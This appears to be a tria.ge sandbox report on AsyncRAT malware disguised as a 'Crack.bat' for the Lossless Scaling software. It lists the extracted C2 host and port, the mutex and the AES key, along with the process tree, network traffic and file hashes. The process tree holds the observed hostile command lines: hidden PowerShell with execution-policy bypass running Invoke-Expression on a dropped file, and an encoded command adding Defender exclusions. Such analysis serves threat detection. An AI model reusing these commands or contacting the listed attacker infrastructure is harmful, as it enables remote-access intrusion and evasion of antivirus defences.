Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

lossless s...ck.bat

windows11-21h2-x64

10

lossless s...ck.bat

windows11-21h2-x64

10

lossless s...an.vbs

windows11-21h2-x64

3

lossless s...AR.exe

windows11-21h2-x64

3

lossless s...RU.ps1

windows11-21h2-x64

3

lossless s...UK.ps1

windows11-21h2-x64

10

lossless s...an.vbs

windows11-21h2-x64

3

lossless s...ss.dll

windows11-21h2-x64

1

lossless s...ng.exe

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

lossless s...es.dll

windows11-21h2-x64

1

Analysis

  • max time kernel
    500s
  • max time network
    599s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25/01/2025, 10:42 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    lossless scaling/Registration ('Crack')/Crack.bat

  • Size

    14KB

  • MD5

    8bfba49d351559387e43cb66ffeaafc1

  • SHA1

    2a237525a6d906e264b36bb11bdd2d6b997b0a64

  • SHA256

    6be519bd1dcfbfcf4d192d1b8df90434f3fad30792cc817ace43bbec5314f232

  • SHA512

    5ff2536f48dea56d6f1b736875ce88858bd6c4b4b68ae89ce9690b11f9983b4b41882757c6f8f4615e84c1bf782550c82fad1136779d076d198b7360dfdef41a

  • SSDEEP

    384:re23N2+xMcYjLnGHXZYGJ+SbnnGxJ46QLGpbQusYrMTVOJwC9hc+tmsWSYd5Ajdn:re23N2+xMcYjTGHXZYGJ+SbnnGxJ46QC

Score
10/10
asyncratdefaultdefense_evasiondiscoveryexecutionrattrojan

Malware Config

Extracted

Family

asyncrat

Version

A 14

Botnet

Default

C2

3x3.casacam.net:303

Mutex

MaterxMutex_Egypt2

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
vdDVRq30NIyYsZw6RuvhCEaeUaMMY7TJ

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 6 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\Crack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4580
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:504
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:4228
      • C:\Windows\system32\xcopy.exe
        xcopy "C:\Users\Admin\AppData\Local\Temp\lossless scaling\Registration ('Crack')\\Data\en-US" "C:\Users\Public\IObitUnlocker" /E /H /C /I /Y
        2⤵
          PID:5040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "& {Get-Content 'C:\Users\Public\IObitUnlocker\UK.dll' | Out-String | Invoke-Expression}"
          2⤵
          • UAC bypass
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:564
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /query /tn administrator
            3⤵
              PID:4916
            • C:\Users\Public\IObitUnlocker\RAR.exe
              "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
              3⤵
              • Executes dropped EXE
              PID:1428
            • C:\Users\Public\IObitUnlocker\BR\Font.exe
              "C:\Users\Public\IObitUnlocker\BR\Font.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2712
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe
                "C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe"
                4⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1396
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:748
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:660
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                    6⤵
                      PID:4100
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                      6⤵
                        PID:468
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        6⤵
                          PID:2784
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                          6⤵
                            PID:4272
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                            6⤵
                              PID:240
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"' & exit
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:1592
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"'
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:4052
                                • C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe
                                  "C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4208
                      • C:\Windows\system32\schtasks.exe
                        "C:\Windows\system32\schtasks.exe" /query /tn administrator
                        3⤵
                          PID:1556
                      • C:\Windows\system32\mode.com
                        mode con: cols=80 lines=10
                        2⤵
                          PID:3764
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABlAGwAcABMAGkAbgBrAFwAQwBlAHIAdABpAGYAaQBjAGEAdABlAC4AZQB4AGUA
                        1⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1572
                      • C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:792
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1148
                      • C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        C:\Users\Admin\AppData\Roaming\HelpLink\Certificate.exe
                        1⤵
                        • Executes dropped EXE
                        PID:3780

                      Network

                      • flag-us
                        DNS
                        3x3.casacam.net
                        aspnet_compiler.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        3x3.casacam.net
                        IN A
                        Response
                        3x3.casacam.net
                        IN A
                        207.231.111.82
                      • flag-us
                        DNS
                        ctldl.windowsupdate.com
                        aspnet_compiler.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        ctldl.windowsupdate.com
                        IN A
                        Response
                        ctldl.windowsupdate.com
                        IN CNAME
                        ctldl.windowsupdate.com.delivery.microsoft.com
                        ctldl.windowsupdate.com.delivery.microsoft.com
                        IN CNAME
                        wu-b-net.trafficmanager.net
                        wu-b-net.trafficmanager.net
                        IN CNAME
                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        IN A
                        91.81.130.133
                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        IN A
                        91.80.49.21
                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        IN A
                        91.81.129.182
                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        IN A
                        91.81.129.181
                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        IN A
                        91.80.49.86
                      • flag-us
                        DNS
                        82.111.231.207.in-addr.arpa
                        aspnet_compiler.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        82.111.231.207.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        discordbots.ddnsgeek.com
                        aspnet_compiler.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        discordbots.ddnsgeek.com
                        IN A
                        Response
                        discordbots.ddnsgeek.com
                        IN A
                        207.231.111.82
                      • flag-us
                        DNS
                        ctldl.windowsupdate.com
                        aspnet_compiler.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        ctldl.windowsupdate.com
                        IN A
                        Response
                        ctldl.windowsupdate.com
                        IN CNAME
                        ctldl.windowsupdate.com.delivery.microsoft.com
                        ctldl.windowsupdate.com.delivery.microsoft.com
                        IN CNAME
                        wu-b-net.trafficmanager.net
                        wu-b-net.trafficmanager.net
                        IN CNAME
                        bg.microsoft.map.fastly.net
                        bg.microsoft.map.fastly.net
                        IN A
                        199.232.214.172
                        bg.microsoft.map.fastly.net
                        IN A
                        199.232.210.172
                      • flag-us
                        DNS
                        188.77.23.2.in-addr.arpa
                        aspnet_compiler.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        188.77.23.2.in-addr.arpa
                        IN PTR
                        Response
                        188.77.23.2.in-addr.arpa
                        IN PTR
                        a2-23-77-188deploystaticakamaitechnologiescom
                      • flag-us
                        DNS
                        discordbots.ddnsgeek.com
                        aspnet_compiler.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        discordbots.ddnsgeek.com
                        IN A
                        Response
                        discordbots.ddnsgeek.com
                        IN A
                        207.231.111.82
                      • flag-us
                        DNS
                        8.8.8.8.in-addr.arpa
                        Remote address:
                        8.8.8.8:53
                        Request
                        8.8.8.8.in-addr.arpa
                        IN PTR
                        Response
                        8.8.8.8.in-addr.arpa
                        IN PTR
                        dnsgoogle
                      • flag-us
                        DNS
                        nexusrules.officeapps.live.com
                        Remote address:
                        8.8.8.8:53
                        Request
                        nexusrules.officeapps.live.com
                        IN A
                        Response
                        nexusrules.officeapps.live.com
                        IN CNAME
                        prod.nexusrules.live.com.akadns.net
                        prod.nexusrules.live.com.akadns.net
                        IN A
                        52.111.229.48
                      • flag-us
                        DNS
                        self.events.data.microsoft.com
                        Remote address:
                        8.8.8.8:53
                        Request
                        self.events.data.microsoft.com
                        IN A
                        Response
                        self.events.data.microsoft.com
                        IN CNAME
                        self-events-data.trafficmanager.net
                        self-events-data.trafficmanager.net
                        IN CNAME
                        onedscolprdcus03.centralus.cloudapp.azure.com
                        onedscolprdcus03.centralus.cloudapp.azure.com
                        IN A
                        13.89.178.27
                      • flag-us
                        DNS
                        ocsp.digicert.com
                        Remote address:
                        8.8.8.8:53
                        Request
                        ocsp.digicert.com
                        IN A
                        Response
                        ocsp.digicert.com
                        IN CNAME
                        ocsp.edge.digicert.com
                        ocsp.edge.digicert.com
                        IN CNAME
                        cac-ocsp.digicert.com.edgekey.net
                        cac-ocsp.digicert.com.edgekey.net
                        IN CNAME
                        e3913.cd.akamaiedge.net
                        e3913.cd.akamaiedge.net
                        IN A
                        2.23.77.188
                      • flag-us
                        DNS
                        ctldl.windowsupdate.com
                        Remote address:
                        8.8.8.8:53
                        Request
                        ctldl.windowsupdate.com
                        IN A
                        Response
                        ctldl.windowsupdate.com
                        IN CNAME
                        ctldl.windowsupdate.com.delivery.microsoft.com
                        ctldl.windowsupdate.com.delivery.microsoft.com
                        IN CNAME
                        wu-b-net.trafficmanager.net
                        wu-b-net.trafficmanager.net
                        IN CNAME
                        bg.microsoft.map.fastly.net
                        bg.microsoft.map.fastly.net
                        IN A
                        199.232.214.172
                        bg.microsoft.map.fastly.net
                        IN A
                        199.232.210.172
                      • flag-us
                        DNS
                        133.130.81.91.in-addr.arpa
                        Remote address:
                        8.8.8.8:53
                        Request
                        133.130.81.91.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        48.229.111.52.in-addr.arpa
                        Remote address:
                        8.8.8.8:53
                        Request
                        48.229.111.52.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        27.178.89.13.in-addr.arpa
                        Remote address:
                        8.8.8.8:53
                        Request
                        27.178.89.13.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        172.214.232.199.in-addr.arpa
                        Remote address:
                        8.8.8.8:53
                        Request
                        172.214.232.199.in-addr.arpa
                        IN PTR
                        Response
                      • flag-us
                        DNS
                        discordbots.ddnsgeek.com
                        Remote address:
                        8.8.8.8:53
                        Request
                        discordbots.ddnsgeek.com
                        IN A
                        Response
                        discordbots.ddnsgeek.com
                        IN A
                        207.231.111.82
                      • 207.231.111.82:303
                        discordbots.ddnsgeek.com
                        tls
                        aspnet_compiler.exe
                        75.6kB
                         1.4MB
                         977
                        1368
                      • 207.231.111.82:303
                        discordbots.ddnsgeek.com
                        tls
                        aspnet_compiler.exe
                        454 B
                         321 B
                         6
                        4
                      • 207.231.111.82:303
                        discordbots.ddnsgeek.com
                        tls
                        aspnet_compiler.exe
                        454 B
                         361 B
                         6
                        5
                      • 207.231.111.82:444
                        discordbots.ddnsgeek.com
                        AddInUtil.exe
                        490 B
                         288 B
                         8
                        6
                      • 207.231.111.82:444
                        discordbots.ddnsgeek.com
                        AddInUtil.exe
                        434 B
                         328 B
                         7
                        7
                      • 207.231.111.82:444
                        discordbots.ddnsgeek.com
                        AddInUtil.exe
                        434 B
                         328 B
                         7
                        7
                      • 8.8.8.8:53
                        3x3.casacam.net
                        dns
                        aspnet_compiler.exe
                        482 B
                         1.1kB
                         7
                        7

                        DNS Request

                        3x3.casacam.net

                        DNS Response

                        207.231.111.82

                        DNS Request

                        ctldl.windowsupdate.com

                        DNS Response

                        91.81.130.133
                        91.80.49.21
                        91.81.129.182
                        91.81.129.181
                        91.80.49.86

                        DNS Request

                        82.111.231.207.in-addr.arpa

                        DNS Request

                        discordbots.ddnsgeek.com

                        DNS Response

                        207.231.111.82

                        DNS Request

                        ctldl.windowsupdate.com

                        DNS Response

                        199.232.214.172
                        199.232.210.172

                        DNS Request

                        188.77.23.2.in-addr.arpa

                        DNS Request

                        discordbots.ddnsgeek.com

                        DNS Response

                        207.231.111.82

                      • 8.8.8.8:53
                        8.8.8.8.in-addr.arpa
                        dns
                        350 B
                         849 B
                         5
                        5

                        DNS Request

                        8.8.8.8.in-addr.arpa

                        DNS Request

                        nexusrules.officeapps.live.com

                        DNS Response

                        52.111.229.48

                        DNS Request

                        self.events.data.microsoft.com

                        DNS Response

                        13.89.178.27

                        DNS Request

                        ocsp.digicert.com

                        DNS Response

                        2.23.77.188

                        DNS Request

                        ctldl.windowsupdate.com

                        DNS Response

                        199.232.214.172
                        199.232.210.172

                      • 8.8.8.8:53
                        133.130.81.91.in-addr.arpa
                        dns
                        359 B
                         664 B
                         5
                        5

                        DNS Request

                        133.130.81.91.in-addr.arpa

                        DNS Request

                        48.229.111.52.in-addr.arpa

                        DNS Request

                        27.178.89.13.in-addr.arpa

                        DNS Request

                        172.214.232.199.in-addr.arpa

                        DNS Request

                        discordbots.ddnsgeek.com

                        DNS Response

                        207.231.111.82

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Certificate.exe.log
                        Filesize

                        838B

                        MD5

                        b2a93166280809b9da482126a28346f6

                        SHA1

                        13705957ad74170698714cc84624196176610f14

                        SHA256

                        d309ddf505140ba12b7ce857aa7e822f24523b86774d423bf1d74c0cf13ff63d

                        SHA512

                        924f31c62f16074ebce62227b417b5ba038cbb54f39390a722e2f934c939eed4b47e2d8dcc87727337d8ddef70466be905cd2e94b386a91ab1ff35b86f9c96fb

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                        Filesize

                        3KB

                        MD5

                        22e796539d05c5390c21787da1fb4c2b

                        SHA1

                        55320ebdedd3069b2aaf1a258462600d9ef53a58

                        SHA256

                        7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

                        SHA512

                        d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        525f62941b065f72297568ad6edefdef

                        SHA1

                        91e926c5a83233362ed0bf20f3eeab16eacde3bd

                        SHA256

                        a145dfb88362c371dbf3b79a6d2fb79096f850b64820524bece543f208068aad

                        SHA512

                        82eb0c1d2384a952f3400544115b9e120f3727113dfdaf3f0cc3c932bc4fa8b7df9f02a5191955419dd29d6420ee10356e468c3b4b2a267198681d791b8c8e41

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        15KB

                        MD5

                        793c849c1b27be16abbb55235f84f5f3

                        SHA1

                        55d83f019df94912977b9222a0546d350c0f7ef6

                        SHA256

                        3a2340721918ae899133a6ffee924013513944986e8d404ea90df48bd7d0252e

                        SHA512

                        d0cc41017e57adfc7bb6c04951eee979d4a02f3ef99c35cac0b26963d91d5686e0e6c3d116fa1c56a8e6bc17cff37193e9b3731af2779ec916f0da07711a0067

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        1KB

                        MD5

                        b72ce05166195fb5b735f51362a8e032

                        SHA1

                        1ac77d57edfe9cb32d156e53da1e8109acfca013

                        SHA256

                        5bfa189d95c903200d92d51d2bcb555a19612916a8437a948f7a6ae487bc0112

                        SHA512

                        f9dfb1775981ece4ef2654834725eeb84a74f6c0e3a5ed2191a23b4b22b1a35a03ad2df3e09ebe4fdf455d54970f705474a8ee84c9be39f0e8c2c54aa66a112e

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\esentutl.exe
                        Filesize

                        156KB

                        MD5

                        6981d94fbcc31ca50551300f5b4a96a3

                        SHA1

                        e38b3a74f2951f5480fb67acc75d41f3e2b4f70e

                        SHA256

                        8c19a90379611efc39c3e96529de2e82a99e3e049d36ef6563ec975836e47811

                        SHA512

                        b94e87c641009ab8206c91ede3e35ab3b65a94fa3be5f4ce7c8a2b17af018f03801086c850427f4d51f4867a3d0a85aaf58ece9fd7f6a36f68df29da430c8d5d

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_32nxfver.vbs.ps1
                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\mlhpqu.exe
                        Filesize

                        628KB

                        MD5

                        1d53f5a867dd69486834f81a7a490a2d

                        SHA1

                        4154fe5c8e4b1a6141c8ea21b9f1a13ed7a4d91c

                        SHA256

                        f804e0bf63f75b3a11c182054a8f02d4f9d2fb182c3a49b105dece388d8d06a1

                        SHA512

                        769c1e9d9ab34bbd6ff3a0ee06d8e21a64e47861712bf92644a7f9f8d1b035dcf148a6d5d92da16ed82c720b0366e26fb93a0fef91e12a70c1790514bf2fe5c1

                        Download Submit

                      • C:\Users\Public\IObitUnlocker\BR\Font.exe
                        Filesize

                        434KB

                        MD5

                        68c9ee084cc409309b116ec6aea890a8

                        SHA1

                        efd6aab18a08a63b146ad587d1fa08e0bb19bebc

                        SHA256

                        ef2cbfdfdd874c6c3ea11223b369fbd5f155d20c680ae1e59ac74e6f1bb74a9d

                        SHA512

                        9809477d42df7bbbaea04da5eda4a4f2ae3114b33541a4efd7003bab339d1c6ddf2f9a61b2ba781c0f5de82b030859c8ac76cbe697b296046227c1dc6b547a25

                        Download Submit

                      • C:\Users\Public\IObitUnlocker\EN.dll
                        Filesize

                        181KB

                        MD5

                        a435e2fb659a3596b017f556b53fa09d

                        SHA1

                        c9ab6229bf239edac73593e0ffb53c1d9bb21686

                        SHA256

                        e7f03b61cff5526877ea3f26f613caf5dbdf9006d49b98c906de3051067d7512

                        SHA512

                        aa3fa16420e66bcdff349ba66791d7849a67d2ae720fdca4b3674ce2a8bffd7a1caae1a306c6533446950b0f8798d6cf7e37ec78ea199252028870fbc742f495

                        Download Submit

                      • C:\Users\Public\IObitUnlocker\Loader.vbs
                        Filesize

                        308B

                        MD5

                        2993b76e0b0ba015caf654881638a0c0

                        SHA1

                        7fbd5f28fb2f6f948cbeb3c4dd5b0672bdfe4bcd

                        SHA256

                        0e131f595ef67c160de9727d9a92a84b50393e66dd242f330736b916e1bf20a3

                        SHA512

                        a61e0e7f92f0d78c27939ba21bdda6ff97503adc44e42a4b7eab3c4c1bea8acad4517b90db3430cabc237c2db01e60ab3a2a78e237ae01a896bd09aabba067cb

                        Download Submit

                      • C:\Users\Public\IObitUnlocker\RAR.exe
                        Filesize

                        629KB

                        MD5

                        d3e9f98155c0faab869ccc74fb5e8a1e

                        SHA1

                        8e4feaad1d43306fdd8aa66efa443bca7afde710

                        SHA256

                        3e0fdb5c40336482dacef3496116053d7772a51720900141b3c6f35c6e9b351b

                        SHA512

                        2760c139ef276f406770675d89fb667f3369a9e1943a6eff2c18f391114018ad6fdce9daf0b499b18081ef22243ef04d74ff21cbd346eb31a1ddbcb79756697d

                        Download Submit

                      • C:\Users\Public\IObitUnlocker\Report.ps1
                        Filesize

                        457KB

                        MD5

                        dd3f962ccc2f5b5f34700307e35138f8

                        SHA1

                        90d80df0ef716260a7d4ed466cf40caf966f0969

                        SHA256

                        e273b5a8cf3d3d37ff676251aa4f41e3726b45b3280f8bf84bf618ca05cca9bb

                        SHA512

                        619fba6cd9b8aae26db23f9cbd6db4870f969abd198d3fe8551703a1e2c46a9d1fd861f7b9462d82581b322209795c1e00762ebe31e0a1383c8a10df8e4a9eae

                        Download Submit

                      • C:\Users\Public\IObitUnlocker\UK.dll
                        Filesize

                        5KB

                        MD5

                        3fffc04611766c3d49b9f0b74752a2b5

                        SHA1

                        c70e6e3b2cd315e900f6dfdd5828cbf75b903fe5

                        SHA256

                        7537dd03a875384bc79a7a21811e06ca97de3571631fc20b4b86b26baaafad9d

                        SHA512

                        3ded3c5712f93eaa75fc9fe9469a02ece5996b6574d63b7b3a5db86db74762631e35aacae519ea3d23862bdaffab5e786696eeb812b0d1ce7f14b78f4539b4d8

                        Download Submit

                      • memory/564-47-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/564-18-0x00007FFF1D2C3000-0x00007FFF1D2C5000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/564-32-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/564-30-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/564-29-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/564-28-0x00007FFF1D2C0000-0x00007FFF1DD82000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/564-27-0x0000020479FF0000-0x000002047A012000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/660-84-0x0000000000400000-0x0000000000416000-memory.dmp

                        Filesize

                        88KB

                        Download

                      • memory/660-93-0x0000000007850000-0x000000000785C000-memory.dmp

                        Filesize

                        48KB

                        Download

                      • memory/660-92-0x00000000076C0000-0x00000000076DE000-memory.dmp

                        Filesize

                        120KB

                        Download

